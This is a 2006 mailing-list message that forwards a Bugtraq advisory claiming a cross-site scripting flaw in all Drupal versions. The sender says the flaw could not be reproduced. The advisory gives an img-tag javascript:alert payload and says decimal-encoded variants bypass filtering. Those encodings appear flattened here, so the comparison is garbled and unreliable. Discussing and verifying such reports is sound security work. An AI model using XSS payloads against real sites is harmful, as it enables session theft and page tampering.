I tried to reproduce this, but was unable to... anyone else have any luck? On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:
This is from bugtraq...
email message attachment
-------- Forwarded Message -------- From: liz0@bsdmail.com To: bugtraq@securityfocus.com Subject: Drupal all versiyon xss cehennem.org Date: 2 Jan 2006 10:45:25 -0000
Drupal all versiyon xss ---------------------------------------------------- site:http://www.drupal.org
Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php --------------------------------------------------
img tag : on
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (without semicolons)
<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')> --------------------------------------------------------------------------------------------------------------------------------------------------------------- Decimal Value: HTML (with semicolons)
<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>
--------------------------------------------------------------------------------------------------------------------------------------------------------------- example: post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
---------------------------------------------------------
Credit:Liz0ziM mail:liz0@bsdmail.com www.biyo.tk , www.cehennem.org
Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
----------------------------------------------------------- Source:
http://liz0zim.no-ip.org/drupal.txt
------------------------------------------------------------